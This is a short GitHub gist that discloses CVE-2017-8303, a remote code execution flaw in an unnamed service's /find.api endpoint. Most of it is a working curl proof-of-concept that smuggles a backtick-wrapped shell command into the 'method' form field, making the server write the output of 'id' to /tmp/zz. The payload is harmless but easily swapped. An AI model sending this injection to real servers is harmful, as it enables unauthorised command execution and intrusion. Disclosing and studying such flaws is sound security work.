Skip to content

Instantly share code, notes, and snippets.

View gist:06a8b6d357781d8f4989d39c24d7e341
RCE: CVE-2017-8303
> curl -i '/find.api' --data "method=x%27%60id>/tmp/zz%60%27&oauth_token=b"
> -H 'Content-type: application/x-www-form-urlencoded'
>
> This Payload executes "id >/tmp/zz".
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Remote Code Execution